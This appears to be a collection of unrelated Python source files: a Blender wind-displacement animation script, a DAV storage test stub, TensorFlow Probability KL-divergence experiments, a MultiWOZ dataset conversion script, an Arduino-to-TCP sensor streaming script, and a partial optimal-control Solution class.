    # Sample three decorrelated noise channels; the third coordinate is
    # offset (0 / 1000 / 9000) to decorrelate them.
    # NOTE(review): the second sample coordinate is fed from pos[2]
    # (height), not pos[1] -- looks intentional, confirm.
    noisec = [pos[0] + timeN,
              pos[2] + timeN,
              0]
    windNoise = [0, 0, 0]
    windNoise[0] = mathutils.noise.noise(noisec)
    noisec[2] = 1000
    windNoise[1] = mathutils.noise.noise(noisec)
    noisec[2] = 9000
    windNoise[2] = mathutils.noise.noise(noisec)
    vcolor = (1, 1, 1, 1)
    if col:
        vcolor = col
    # Superimpose three sine waves of different frequencies, each gated by
    # one color channel, on the vertical (z) and lateral (x) axes; the y
    # axis gets a non-oscillating noise push.
    # (An unused local `distorsion` was removed here.)
    pos[2] += math.sin(timeN * 20) * vcolor[3] * noiseAmmount[2] * vcolor[0] * windNoise[1]
    pos[2] += math.sin(timeN * 15) * vcolor[3] * noiseAmmount[2] * vcolor[1] * windNoise[1]
    pos[2] += math.sin(timeN * 25) * vcolor[3] * noiseAmmount[2] * vcolor[2] * windNoise[1]
    pos[0] += math.sin(timeN * 20) * vcolor[3] * noiseAmmount[0] * vcolor[0] * windNoise[0]
    pos[0] += math.sin(timeN * 15) * vcolor[3] * noiseAmmount[0] * vcolor[1] * windNoise[0]
    pos[0] += math.sin(timeN * 25) * vcolor[3] * noiseAmmount[0] * vcolor[2] * windNoise[0]
    pos[1] += windNoise[0] * noiseAmmount[1] * vcolor[3] * vcolor[0]
    pos[1] += windNoise[1] * noiseAmmount[1] * vcolor[3] * vcolor[1]
    pos[1] += windNoise[2] * noiseAmmount[1] * vcolor[3] * vcolor[2]
    return pos
def preFrameChange(scene):
    """frame_change_pre handler: displace vertices of all selected mesh
    objects with the wind() field, backing up their rest positions in
    Context["store"] so resetAnim() can restore them later."""
    global Context
    timeN = timeNow()
    Context["running"] = True
    Context["lasttick"] = timeNow()
    if Context["starttime"] == -1:
        Context["starttime"] = Context["lasttick"]
    noiseAmmount = (1, 1, 1)  # global wind strength per axis
    # Animation time = seconds elapsed since the first handled frame.
    timeN = Context["lasttick"] - Context["starttime"]
    if not "cols" in Context:
        Context["cols"] = {}
    if bpy.ops.object.mode_set.poll():
        for obj in bpy.context.scene.objects:
            if obj.select_get():
                if not obj in Context["store"]:
                    Context["store"][obj] = {}
                if not obj in Context["cols"]:
                    Context["cols"][obj] = {}
                src_mesh = obj.data
                # Cache per-vertex colors from the active vertex-color layer,
                # keyed by vertex index; a 1.0 is appended as a fallback alpha
                # (NOTE(review): if the layer already stores RGBA this makes a
                # 5-component entry -- confirm the layer format).
                for i, poly in enumerate(src_mesh.polygons):
                    for k in poly.loop_indices:
                        vl = src_mesh.loops[k]
                        index = vl.vertex_index
                        if src_mesh.vertex_colors.active:
                            c = []
                            c.extend(src_mesh.vertex_colors.active.data[k].color)
                            c.append(1.0)
                            Context["cols"][obj][index] = c
                bpy.ops.object.mode_set(mode='EDIT')
                mesh = bmesh.from_edit_mesh(obj.data)
                for vert in mesh.verts:
                    # First sighting of this vertex: remember its rest position.
                    if not vert.index in Context["store"][obj]:
                        v = []
                        v.append(vert.co[0])
                        v.append(vert.co[1])
                        v.append(vert.co[2])
                        Context["store"][obj][vert.index] = v
                        #print("Store "+str(vert.index)+str(v))
                    col = Context["cols"][obj][vert.index] if vert.index in Context["cols"][obj] else None
                    # Always displace from the stored rest position, never from
                    # the current (already displaced) coordinates.
                    vert.co = wind(vert, tuple(Context["store"][obj][vert.index]), col, noiseAmmount, timeN)
                bmesh.update_edit_mesh(obj.data)
                bpy.ops.object.mode_set(mode='OBJECT')
def resetAnim():
    """Timer callback: once frame-change ticks stop arriving (playback
    stopped), restore every displaced vertex to its stored rest position and
    drop the cached state. Returns the delay until the next timer tick."""
    global Context
    if Context["running"]:
        dtime = timeNow() - Context["lasttick"]
        frametime2 = calcFrameTime() * 2
        # No tick for two frame durations => playback has stopped.
        if dtime > frametime2:
            print("Reset Now")
            for obj in bpy.context.scene.objects:
                if obj in Context["store"]:
                    bpy.ops.object.mode_set(mode='EDIT')
                    mesh = bmesh.from_edit_mesh(obj.data)
                    for vert in mesh.verts:
                        if vert.index in Context["store"][obj]:
                            v = Context["store"][obj][vert.index]
                            #print("Reset "+str(vert.index)+" to "+str(v))
                            vert.co = v
                    bmesh.update_edit_mesh(obj.data)
                    bpy.ops.object.mode_set(mode='OBJECT')
                    del Context["store"][obj]
            Context["running"] = False
            del Context["cols"]
    delay = calcFrameTime()
    return delay
class ModalTimerOperator(bpy.types.Operator):
    """Modal operator that periodically calls resetAnim() so the mesh is
    restored once playback stops. Cancelled with right-click or Esc."""
    bl_idname = "wm.modal_timer_operator"
    bl_label = "Modal Timer Operator"
    _timer = None

    def modal(self, context, event):
        if event.type in {'RIGHTMOUSE', 'ESC'}:
            self.cancel(context)
            return {'CANCELLED'}
        if event.type == 'TIMER':
            resetAnim()
        # Every other event (and handled timer ticks) passes through.
        return {'PASS_THROUGH'}

    def execute(self, context):
        wm = context.window_manager
        # Fire the timer roughly once per frame.
        self._timer = wm.event_timer_add(calcFrameTime(), window=context.window)
        wm.modal_handler_add(self)
        return {'RUNNING_MODAL'}

    def cancel(self, context):
        wm = context.window_manager
        wm.event_timer_remove(self._timer)
def register():
    """Install the frame-change handler and register the modal-timer operator."""
    bpy.app.handlers.frame_change_pre.append(preFrameChange)
    bpy.utils.register_class(ModalTimerOperator)
def unregister():
    """Remove the frame-change handler (the operator class stays registered)."""
    bpy.app.handlers.frame_change_pre.remove(preFrameChange)
# Script entry: install the handlers and start the modal timer immediately.
register()
bpy.ops.wm.modal_timer_operator()
|
python
|
# -*- coding: utf-8 -*-
import os
from .. import StorageTests, get_server_mixin
# Which DAV server implementation to test against; "skip" disables the suite.
dav_server = os.environ.get('DAV_SERVER', 'skip')
ServerMixin = get_server_mixin(dav_server)
class DAVStorageTests(ServerMixin, StorageTests):
    """Storage test suite bound to the DAV server selected via $DAV_SERVER."""
    dav_server = dav_server  # expose the module-level selection to the mixin
|
python
|
from __future__ import absolute_import, division, print_function
import os
import time
import numpy as np
import seaborn as sns
import tensorflow as tf
import tensorflow_probability as tfp
from matplotlib import pyplot as plt
from tensorflow import keras
from odin import visual as vs
from odin.bay import kl_divergence
# Silence TensorFlow C++ logging and avoid grabbing all GPU memory up front.
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'
# Fix the seeds for reproducibility.
tf.random.set_seed(8)
np.random.seed(8)
sns.set()
# ===========================================================================
# Helper functions
# ===========================================================================
def minimize(loss_func,
             params,
             verbose=False,
             print_params=True,
             learning_rate=0.1,
             epochs=500):
    """Minimize `loss_func` over `params` with Adam and return the history.

    Each history entry is `[loss_value, *param_values]`, recorded *before*
    the corresponding gradient step is applied.
    """
    optimizer = tf.optimizers.Adam(learning_rate=learning_rate)
    step_times = []
    history = []
    for epoch in range(epochs):
        tick = time.time()
        with tf.GradientTape() as tape:
            tape.watch(params)
            loss = tf.reduce_mean(loss_func())
        gradients = tape.gradient(loss, params)
        step_times.append(time.time() - tick)
        # Report twice per run (at the half-way point and at the end).
        if verbose and (epoch + 1) % (epochs // 2) == 0:
            print("#%-4d Loss:%.4f (%.2f sec/100)" %
                  (epoch + 1, loss, np.mean(step_times) * 100))
            if print_params:
                for param in params:
                    print(' * %s: %s' % (param.name, str(param.numpy())))
        history.append([loss.numpy()] + [param.numpy() for param in params])
        optimizer.apply_gradients(grads_and_vars=zip(gradients, params))
    return history
# Factory for a trainable univariate Normal posterior q(x) = N(loc, scale).
create_posterior = lambda: tfp.distributions.Normal(
    loc=tf.Variable(0., dtype='float32', trainable=True, name='loc'),
    scale=tf.Variable(1., dtype='float32', trainable=True, name='scale'),
    name='Normal')
# NOTE: it important to get the loc spread wide enough to prevent mode collapse
# however, the scale must be small enough for not exploding the gradients
# Factory for a trainable n-component Gaussian mixture with uniform weights
# and component means spread evenly over [loc_min, loc_max].
create_mixture_posterior = lambda n, loc_min=0, loc_max=100: \
    tfp.distributions.MixtureSameFamily(
        mixture_distribution=tfp.distributions.Categorical(probs=[1. / n] * n),
        components_distribution=tfp.distributions.Normal(
            loc=tf.Variable(
                np.linspace(loc_min, loc_max, n),
                dtype='float32', trainable=True, name='loc'),
            scale=tf.Variable(
                [1.] * n, dtype='float32', trainable=True, name='scale')))
def plot_posteriors(posterior, prior, n=1000):
    """Overlay KDE plots of `n` samples from the prior and from each entry of
    `posterior` (a list of (dist, analytic, reverse, sample_shape) tuples);
    reverse-KL posteriors are drawn with solid lines, forward-KL dashed."""
    # this is very hard-coded function
    plt.figure(figsize=(12, 8))
    sns.kdeplot(prior.sample(int(n)).numpy(), label="Prior")
    for post, analytic, reverse, sample_shape in posterior:
        sns.kdeplot(post.sample(int(n)).numpy(),
                    linestyle='-' if reverse else '--',
                    label='%s-%s mcmc:%d' % ('KL(q||p)' if reverse else 'KL(p||q)',
                                             'A' if analytic else 'S', sample_shape))
def plot_histories(posterior, histories):
    """One subplot per posterior: loc/scale trajectories on the left axis and
    the loss curve (red) on a twinned right axis, over training iterations."""
    plt.figure(figsize=(24, 5))
    for idx, (post, analytic, reverse, sample_shape) in enumerate(posterior):
        ax = plt.subplot(1, len(posterior), idx + 1)
        hist = histories[idx]
        name = '%s-%s mcmc:%d' % \
            ('KL(q||p)' if reverse else 'KL(p||q)', 'A' if analytic else 'S', sample_shape)
        # History rows are [loss, loc, scale] -- see minimize() and the
        # params order used by the callers.
        loc = np.asarray([i[1] for i in hist])
        plt.plot(loc, label='loc', linestyle='-' if reverse else '--')
        scale = np.asarray([i[2] for i in hist])
        plt.plot(scale, label='scale', linestyle='-' if reverse else '--')
        plt.legend()
        ax = ax.twinx()  # second y-axis for the loss curve
        plt.plot([i[0] for i in hist], label='loss', color='r')
        plt.title(name)
    plt.tight_layout()
# ===========================================================================
# Can deep network fix posterior mode collapse due to loc initialization
# * Appropriate learning rate is essential
# * High amount of components help, but not too high
# * Too deep network will make overfitting to the first components.
# * If input features are useless, deep network cannot help
# * maximum likelihood might end up with more modes
# ===========================================================================
# 3-component Gaussian-mixture target distribution.
prior = tfp.distributions.MixtureSameFamily(
    mixture_distribution=tfp.distributions.Categorical(probs=[1.0 / 3] * 3),
    components_distribution=tfp.distributions.Normal(loc=[0, 25, 80],
                                                     scale=[1, 12, 4]))
n_components = 3
# Fixed network input; the second assignment (evenly spread values)
# overrides the first all-zeros one.
X = np.zeros(shape=(1, n_components)).astype('float32')
X = np.linspace(0, 80, num=n_components, dtype='float32')[None, :]
# X = np.random.rand(1, 3).astype('float32')
outputs = {}
# Fit the posterior twice: minimizing reverse KL(q||p) and forward KL(p||q).
for reverse in (True, False):
    # A small MLP maps X to the component locations; scales are free variables.
    loc = keras.Sequential([
        keras.layers.Dense(16, activation='relu', input_shape=(n_components,)),
        keras.layers.Dense(n_components,
                           activation='linear',
                           input_shape=(n_components,)),
    ])
    scale = tf.Variable([1.] * n_components,
                        dtype='float32',
                        trainable=True,
                        name='scale')
    history = minimize(lambda: kl_divergence(tfp.distributions.MixtureSameFamily(
        mixture_distribution=tfp.distributions.Categorical(
            probs=[1. / n_components] * n_components),
        components_distribution=tfp.distributions.Normal(loc=loc(X), scale=scale
                                                         )),
                                             prior,
                                             reverse=reverse,
                                             q_sample=100),
                       params=loc.trainable_variables + [scale],
                       verbose=True,
                       print_params=False,
                       learning_rate=0.01,
                       epochs=1200)
    # Rebuild the fitted posterior from the trained loc network and scales.
    posterior = tfp.distributions.MixtureSameFamily(
        mixture_distribution=tfp.distributions.Categorical(
            probs=[1. / n_components] * n_components),
        components_distribution=tfp.distributions.Normal(loc=loc(X), scale=scale))
    outputs[reverse] = [posterior, history]
# Left: sampled densities of prior and both posteriors; right: loss curves.
plt.figure(figsize=(18, 8))
plt.subplot(1, 2, 1)
sns.kdeplot(prior.sample(10000).numpy(), label='Prior')
sns.kdeplot(outputs[True][0].sample(10000).numpy().ravel(),
            label='Posterior-KL(q||p)')
sns.kdeplot(outputs[False][0].sample(10000).numpy().ravel(),
            label='Posterior-KL(p||q)',
            linestyle='--')
plt.legend()
ax = plt.subplot(1, 2, 2)
l1 = plt.plot([i[0] for i in outputs[True][1]], label='KL(q||p)')
ax.twinx()  # separate scale for the forward-KL loss
l2 = plt.plot([i[0] for i in outputs[False][1]],
              label='KL(p||q)',
              linestyle='--')
plt.title("KL loss")
plt.legend(handles=[l1[0], l2[0]])
# ===========================================================================
# Mixture with Mixture Posterior
# ===========================================================================
# 3-mode mixture prior, approximated by mixture posteriors that are under-,
# exactly- and over-parameterized (n = 2, 3, 5).
prior = tfp.distributions.MixtureSameFamily(
    mixture_distribution=tfp.distributions.Categorical(probs=[1.0 / 3] * 3),
    components_distribution=tfp.distributions.Normal(loc=[0, 32, 80],
                                                     scale=[1, 12, 4]))
for n in [2, 3, 5]:
    # analytic, reverse, nmcmc
    posterior = [
        (create_mixture_posterior(n=n), False, True, 1),
        (create_mixture_posterior(n=n), False, False, 1),
        (create_mixture_posterior(n=n), False, True, 100),
        (create_mixture_posterior(n=n), False, False, 100),
    ]
    histories = []
    for post, analytic, reverse, sample_shape in posterior:
        print("Training:", analytic, reverse, sample_shape)
        h = minimize(lambda: kl_divergence(
            q=post, p=prior, analytic=analytic, reverse=reverse, q_sample=sample_shape), [
                post.components_distribution.loc, post.components_distribution.scale
            ],
            verbose=False)
        histories.append(h)
    # for more complicated distribution, need more samples
    plot_posteriors(posterior, prior, n=10000)
    plt.title("Prior:3-mixture Posterior:%d-mixture" % n)
    plot_histories(posterior, histories)
vs.plot_save()
# NOTE(review): exit() terminates the script here -- everything below is
# currently dead code, presumably kept for selective experimentation.
exit()
# ===========================================================================
# Mixture with Normal Posterior
# ===========================================================================
# 2-component mixture prior approximated by a single Normal posterior.
prior = tfp.distributions.MixtureSameFamily(
    mixture_distribution=tfp.distributions.Categorical(probs=[0.5, 0.5]),
    components_distribution=tfp.distributions.Normal(loc=[2, 20], scale=[1, 4]))
posterior = [
    (create_posterior(), False, True, 1),  # analytic, reverse, nmcmc
    (create_posterior(), False, False, 1),
    (create_posterior(), False, True, 100),
    (create_posterior(), False, False, 100),
]
histories = []
for post, analytic, reverse, sample_shape in posterior:
    print("Training:", analytic, reverse, sample_shape)
    h = minimize(lambda: kl_divergence(
        q=post, p=prior, analytic=analytic, reverse=reverse, q_sample=sample_shape),
        [post.loc, post.scale],
        verbose=False)
    histories.append(h)
plot_posteriors(posterior, prior)
plt.title("Prior:2-mixture Posterior:Normal")
plot_histories(posterior, histories)
# ===========================================================================
# Simple distribution
# ===========================================================================
# Normal prior with Normal posterior: the analytic KL is available here, so
# analytic and sampled estimators can be compared directly.
prior = tfp.distributions.Normal(loc=8, scale=12)
posterior = [
    (create_posterior(), True, True, 1),  # analytic, reverse, nmcmc
    (create_posterior(), True, False, 1),
    (create_posterior(), False, True, 1),
    (create_posterior(), False, True, 100),
    (create_posterior(), False, False, 1),
    (create_posterior(), False, False, 100)
]
histories = []
for post, analytic, reverse, sample_shape in posterior:
    print("Training:", analytic, reverse, sample_shape)
    h = minimize(lambda: kl_divergence(
        q=post, p=prior, analytic=analytic, reverse=reverse, q_sample=sample_shape),
        [post.loc, post.scale],
        verbose=False)
    histories.append(h)
plot_posteriors(posterior, prior)
plt.title("Prior:Normal Posterior:Normal")
plot_histories(posterior, histories)
|
python
|
"""Script to convert MultiWOZ 2.2 from SGD format to MultiWOZ format."""
import glob
import json
import os
from absl import app
from absl import flags
from absl import logging
FLAGS = flags.FLAGS
flags.DEFINE_string("multiwoz21_data_dir", None,
                    "Path of the MultiWOZ 2.1 dataset.")
flags.DEFINE_string("output_file", None, "Output file path in MultiWOZ format.")
# Booking slots that MultiWOZ 2.2 does not track; their values are left as-is
# during state correction.
_UNTRACKED_SLOTS = frozenset({
    "taxi-bookphone", "train-booktrainid", "taxi-booktype",
    "restaurant-bookreference", "hospital-bookreference", "hotel-bookreference",
    "train-bookreference", "hospital-booktime"
})
# Directory containing this script (and the 2.2 dialogue/act files).
_DIR_PATH = os.path.dirname(os.path.abspath(__file__))
flags.mark_flags_as_required(["multiwoz21_data_dir", "output_file"])
def get_slot_name(slot_name, service_name, in_book_field=False):
    """Build the schema-style slot name, e.g. ("day", "hotel", True) -> "hotel-bookday".

    Slots found inside a booking record get a "book" prefix, except the
    "department" and "name" slots which keep their plain names.
    """
    needs_book_prefix = in_book_field and slot_name not in ("department", "name")
    if needs_book_prefix:
        slot_name = "book" + slot_name
    return ("%s-%s" % (service_name, slot_name)).lower()
def format_states(groundtruth_states, states_to_correct):
    """Correct the dialogue states in `states_to_correct` in place.

    Every tracked slot is overwritten with its MultiWOZ 2.2 ground-truth
    value from `groundtruth_states`; tracked slots missing from the ground
    truth are reset to []. Slots listed in _UNTRACKED_SLOTS are left alone.
    """
    for domain_name, domain_state in states_to_correct.items():
        book_state = domain_state["book"]
        for key, value in book_state.items():
            if isinstance(value, list):
                # A list of booked items, each a dict of slot -> value.
                for booked_item in value:
                    for slot in booked_item:
                        schema_slot = get_slot_name(slot, domain_name, in_book_field=True)
                        if schema_slot in _UNTRACKED_SLOTS:
                            continue
                        # Tracked slot: take the ground-truth value (or reset).
                        booked_item[slot] = groundtruth_states.get(schema_slot, [])
            if isinstance(value, str):
                schema_slot = get_slot_name(key, domain_name, in_book_field=True)
                if schema_slot in _UNTRACKED_SLOTS:
                    continue
                book_state[key] = groundtruth_states.get(schema_slot, [])
        semi_state = domain_state["semi"]
        for slot in semi_state:
            schema_slot = get_slot_name(slot, domain_name)
            # All the slots in "semi" are tracked.
            semi_state[slot] = groundtruth_states.get(schema_slot, [])
def main(argv):
    """Merge the MultiWOZ 2.2 corrections back into the 2.1 data and write
    the result, in MultiWOZ format, to FLAGS.output_file."""
    data_path = os.path.join(FLAGS.multiwoz21_data_dir, "data.json")
    with open(data_path, "r") as f:
        multiwoz_data = json.load(f)
    # Load the corrected 2.2 dialogues from all splits, keyed by dialogue id.
    file_pattern = os.path.join(_DIR_PATH, "*/dialogues_*.json")
    files = glob.glob(file_pattern)
    clean_data = {}
    for file_name in files:
        with open(file_name, "r") as f:
            dialogues = json.load(f)
        for dialogue in dialogues:
            clean_data[dialogue["dialogue_id"]] = dialogue
    # Load action file.
    action_file = os.path.join(_DIR_PATH, "dialog_acts.json")
    with open(action_file, "r") as f:
        action_data = json.load(f)
    dialogue_ids = list(multiwoz_data.keys())
    for dialogue_id in dialogue_ids:
        dialogue = multiwoz_data[dialogue_id]["log"]
        # Drop dialogues that were removed in MultiWOZ 2.2.
        if dialogue_id not in clean_data:
            logging.info("Dialogue %s doesn't exist in MultiWOZ 2.2.", dialogue_id)
            del multiwoz_data[dialogue_id]
            continue
        clean_dialogue = clean_data[dialogue_id]
        for i, turn in enumerate(dialogue):
            # Update the utterance.
            turn["text"] = clean_dialogue["turns"][i]["utterance"]
            dialog_act = {}
            span_info = []
            if str(i) in action_data[dialogue_id]:
                dialog_act = action_data[dialogue_id][str(i)]["dialog_act"]
                span_info = action_data[dialogue_id][str(i)]["span_info"]
            turn["dialog_act"] = dialog_act
            turn["span_info"] = span_info
            # Skip user turns because states are written in the system turns.
            if i % 2 == 0:
                continue
            # Gather the 2.2 ground-truth state from the preceding user turn
            # and overwrite this system turn's metadata with it.
            clean_states = {}
            for frame in clean_dialogue["turns"][i - 1]["frames"]:
                clean_states.update(frame["state"]["slot_values"])
            format_states(clean_states, turn["metadata"])
    with open(FLAGS.output_file, "w") as f:
        json.dump(multiwoz_data, f, indent=2, separators=(",", ": "), sort_keys=True)
    logging.info("Finish writing %d dialogues", len(multiwoz_data))
# absl entry point: parses the command-line flags, then calls main(argv).
if __name__ == "__main__":
    app.run(main)
|
python
|
# SENSOR_DATA_TRANSFER
# Accept a single TCP client, then stream lines read from an Arduino on
# /dev/ttyACM0 to it.
import socket
import serial
import time

host = "192.168.137.54"  # address to listen on
port = 50007

mySocket = socket.socket()
mySocket.bind((host, port))
mySocket.listen(1)
conn, addr = mySocket.accept()
print("Connection from: " + str(addr))

aD = serial.Serial('/dev/ttyACM0', 9600)
while True:
    # Busy-wait until at least one byte is available from the Arduino.
    while (aD.inWaiting() == 0):
        pass
    try:
        astring = str(aD.readline())
        # Strip the "b'" prefix and the trailing "\r\n'" produced by
        # str() on the bytes returned by readline().
        astring = astring[2:]
        astring = astring[:-5]
        conn.send(astring.encode())
        time.sleep(0.09)
    except Exception:
        # Best-effort streaming: skip malformed reads and transient send
        # errors, but let KeyboardInterrupt/SystemExit through (the
        # original bare `except:` swallowed those too).
        pass
# Unreachable: the loop above only ends via an un-caught exception.
conn.close()
|
python
|
import time
from typing import Any, Union
from copy import deepcopy
import biorbd_casadi as biorbd
import numpy as np
from scipy import interpolate as sci_interp
from scipy.integrate import solve_ivp
from casadi import vertcat, DM, Function
from matplotlib import pyplot as plt
from ..dynamics.ode_solver import OdeSolver
from ..limits.path_conditions import InitialGuess, InitialGuessList
from ..misc.enums import ControlType, CostType, Shooting, InterpolationType, Solver
from ..misc.utils import check_version
from ..optimization.non_linear_program import NonLinearProgram
from ..optimization.optimization_variable import OptimizationVariableList, OptimizationVariable
class Solution:
"""
Data manipulation, graphing and storage
Attributes
----------
ocp: SimplifiedOCP
The OCP simplified
ns: list
The number of shooting point for each phase
is_interpolated: bool
If the current structure is interpolated
is_integrated: bool
If the current structure is integrated
is_merged: bool
If the phases were merged
vector: np.ndarray
The data in the vector format
_cost: float
The value of the cost function
constraints: list
The values of the constraint
lam_g: list
The Lagrange multiplier of the constraints
lam_p: list
The Lagrange multiplier of the parameters
lam_x: list
The Lagrange multiplier of the states and controls
inf_pr: list
The unscaled constraint violation at each iteration
inf_du: list
The scaled dual infeasibility at each iteration
solver_time_to_optimize: float
The total time to solve the program
iterations: int
The number of iterations that were required to solve the program
status: int
Optimization success status (Ipopt: 0=Succeeded, 1=Failed)
_states: list
The data structure that holds the states
_controls: list
The data structure that holds the controls
parameters: dict
The data structure that holds the parameters
phase_time: list
The total time for each phases
Methods
-------
copy(self, skip_data: bool = False) -> Any
Create a deepcopy of the Solution
@property
states(self) -> Union[list, dict]
Returns the state in list if more than one phases, otherwise it returns the only dict
@property
controls(self) -> Union[list, dict]
Returns the controls in list if more than one phases, otherwise it returns the only dict
integrate(self, shooting_type: Shooting = Shooting.MULTIPLE, keep_intermediate_points: bool = True,
merge_phases: bool = False, continuous: bool = True) -> Solution
Integrate the states
interpolate(self, n_frames: Union[int, list, tuple]) -> Solution
Interpolate the states
merge_phases(self) -> Solution
Get a data structure where all the phases are merged into one
_merge_phases(self, skip_states: bool = False, skip_controls: bool = False) -> tuple
Actually performing the phase merging
_complete_control(self)
Controls don't necessarily have dimensions that matches the states. This method aligns them
graphs(self, automatically_organize: bool, show_bounds: bool,
show_now: bool, shooting_type: Shooting)
Show the graphs of the simulation
animate(self, n_frames: int = 0, show_now: bool = True, **kwargs: Any) -> Union[None, list]
Animate the simulation
print(self, cost_type: CostType = CostType.ALL)
Print the objective functions and/or constraints to the console
"""
    class SimplifiedOptimizationVariable:
        """
        Simplified version of OptimizationVariable (compatible with pickle)
        """

        def __init__(self, other: OptimizationVariable):
            # Copy only the picklable fields of the original variable.
            self.name = other.name
            self.index = other.index
            self.mapping = other.mapping

        def __len__(self):
            # Number of scalar entries this variable spans.
            return len(self.index)
    class SimplifiedOptimizationVariableList:
        """
        Simplified version of OptimizationVariableList (compatible with pickle)
        """

        def __init__(self, other: Union[OptimizationVariableList]):
            self.elements = []
            if isinstance(other, Solution.SimplifiedOptimizationVariableList):
                # Copying from an already-simplified list: reuse its shape.
                self.shape = other.shape
            else:
                # Original list: shape is the row count of its CasADi vector.
                self.shape = other.cx.shape[0]
            for elt in other:
                self.append(other[elt])

        def __getitem__(self, item):
            # Index either by position (int) or by variable name (str).
            if isinstance(item, int):
                return self.elements[item]
            elif isinstance(item, str):
                for elt in self.elements:
                    if item == elt.name:
                        return elt
                raise KeyError(f"{item} is not in the list")
            else:
                raise ValueError("OptimizationVariableList can be sliced with int or str only")

        def append(self, other: OptimizationVariable):
            # Store a stripped-down (picklable) copy of the variable.
            self.elements.append(Solution.SimplifiedOptimizationVariable(other))

        def __contains__(self, item):
            # Membership is tested against variable names.
            for elt in self.elements:
                if item == elt.name:
                    return True
            else:
                return False

        def keys(self):
            return [elt.name for elt in self]

        def __len__(self):
            return len(self.elements)

        def __iter__(self):
            # Stateful iterator over variable names (not re-entrant).
            self._iter_idx = 0
            return self

        def __next__(self):
            self._iter_idx += 1
            if self._iter_idx > len(self):
                raise StopIteration
            return self[self._iter_idx - 1].name
    class SimplifiedNLP:
        """
        A simplified version of the NonLinearProgram structure (compatible with pickle)

        Attributes
        ----------
        control_type: ControlType
            The control type for the current nlp
        dynamics: list[ODE_SOLVER]
            All the dynamics for each of the node of the phase
        g: list[list[Constraint]]
            All the constraints at each of the node of the phase
        J: list[list[Objective]]
            All the objectives at each of the node of the phase
        model: biorbd.Model
            A reference to the biorbd Model
        variable_mappings: dict
            All the BiMapping of the states and controls
        ode_solver: OdeSolverBase
            The number of finite element of the RK
        ns: int
            The number of shooting points
        """

        def __init__(self, nlp: NonLinearProgram):
            """
            Parameters
            ----------
            nlp: NonLinearProgram
                A reference to the NonLinearProgram to strip
            """
            self.phase_idx = nlp.phase_idx
            self.model = nlp.model
            # States/controls are stripped to their picklable simplified form.
            self.states = Solution.SimplifiedOptimizationVariableList(nlp.states)
            self.controls = Solution.SimplifiedOptimizationVariableList(nlp.controls)
            self.dynamics = nlp.dynamics
            self.dynamics_func = nlp.dynamics_func
            self.ode_solver = nlp.ode_solver
            self.variable_mappings = nlp.variable_mappings
            self.control_type = nlp.control_type
            # Objectives/constraints (user-defined and internal), by reference.
            self.J = nlp.J
            self.J_internal = nlp.J_internal
            self.g = nlp.g
            self.g_internal = nlp.g_internal
            self.ns = nlp.ns
            self.parameters = nlp.parameters
    class SimplifiedOCP:
        """
        A simplified version of the NonLinearProgram structure (compatible with pickle)

        Attributes
        ----------
        g: list
            Constraints that are not phase dependent (mostly parameters and continuity constraints)
        J: list
            Objective values that are not phase dependent (mostly parameters)
        nlp: NLP
            All the phases of the ocp
        phase_transitions: list[PhaseTransition]
            The list of transition constraint between phases
        prepare_plots: Callable
            The function to call to prepare the PlotOCP
        v: OptimizationVector
            The variable optimization holder
        """

        def __init__(self, ocp):
            """
            Parameters
            ----------
            ocp: OptimalControlProgram
                A reference to the ocp to strip
            """
            # Strip every phase down to its simplified (picklable) form.
            self.nlp = [Solution.SimplifiedNLP(nlp) for nlp in ocp.nlp]
            self.v = ocp.v
            self.J = ocp.J
            self.J_internal = ocp.J_internal
            self.g = ocp.g
            self.g_internal = ocp.g_internal
            self.phase_transitions = ocp.phase_transitions
            self.prepare_plots = ocp.prepare_plots
    def __init__(self, ocp, sol: Union[dict, list, tuple, np.ndarray, DM, None]):
        """
        Parameters
        ----------
        ocp: OptimalControlProgram
            A reference to the ocp to strip
        sol: Union[dict, list, tuple, np.ndarray, DM]
            The values of a solution
        """

        # Keep only a pickle-friendly, stripped-down copy of the ocp
        self.ocp = Solution.SimplifiedOCP(ocp) if ocp else None
        # NOTE(review): if ocp is falsy the next line raises on self.ocp.nlp -- confirm callers always pass an ocp
        self.ns = [nlp.ns for nlp in self.ocp.nlp]

        # Current internal state of the data
        self.is_interpolated = False
        self.is_integrated = False
        self.is_merged = False
        self.recomputed_time_steps = False

        # Solver outputs; stay None unless filled by init_from_dict below
        self.vector = None
        self._cost = None
        self.constraints = None

        self.lam_g = None  # Lagrange multipliers of the constraints
        self.lam_p = None  # Lagrange multipliers of the parameters
        self.lam_x = None  # Lagrange multipliers of the variables
        self.inf_pr = None  # primal infeasibility reported by the solver
        self.inf_du = None  # dual infeasibility reported by the solver
        self.solver_time_to_optimize = None
        self.real_time_to_optimize = None
        self.iterations = None
        self.status = None

        # Extract the data now for further use
        self._states, self._controls, self.parameters = {}, {}, {}
        self.phase_time = []

        def init_from_dict(_sol: dict):
            """
            Initialize all the attributes from an Ipopt-like dictionary data structure

            Parameters
            ----------
            _sol: dict
                The solution in a Ipopt-like dictionary
            """

            self.vector = _sol["x"]
            # The detailed optimality data is only provided by Ipopt-like solvers
            if _sol["solver"] == Solver.IPOPT:
                self._cost = _sol["f"]
                self.constraints = _sol["g"]

                self.lam_g = _sol["lam_g"]
                self.lam_p = _sol["lam_p"]
                self.lam_x = _sol["lam_x"]
                self.inf_pr = _sol["inf_pr"]
                self.inf_du = _sol["inf_du"]

            self.solver_time_to_optimize = _sol["solver_time_to_optimize"]
            self.real_time_to_optimize = _sol["real_time_to_optimize"]
            self.iterations = _sol["iter"]
            self.status = _sol["status"]

            # Extract the data now for further use
            self._states, self._controls, self.parameters = self.ocp.v.to_dictionaries(self.vector)
            self._complete_control()
            self.phase_time = self.ocp.v.extract_phase_time(self.vector)

        def init_from_initial_guess(_sol: list):
            """
            Initialize all the attributes from a list of initial guesses (states, controls)

            Parameters
            ----------
            _sol: list
                The list of initial guesses
            """

            n_param = len(ocp.v.parameters_in_list)

            # Sanity checks
            for i in range(len(_sol)):  # Convert to list if necessary and copy for as many phases there are
                if isinstance(_sol[i], InitialGuess):
                    tp = InitialGuessList()
                    for _ in range(len(self.ns)):
                        tp.add(deepcopy(_sol[i].init), interpolation=_sol[i].init.type)
                    _sol[i] = tp
            if sum([isinstance(s, InitialGuessList) for s in _sol]) != 2:
                # NOTE(review): despite the message mentioning "len 2 or 3", exactly two
                # InitialGuessList entries (states, controls) are required here -- confirm intent
                raise ValueError(
                    "solution must be a solution dict, "
                    "an InitialGuess[List] of len 2 or 3 (states, controls, parameters), "
                    "or a None"
                )
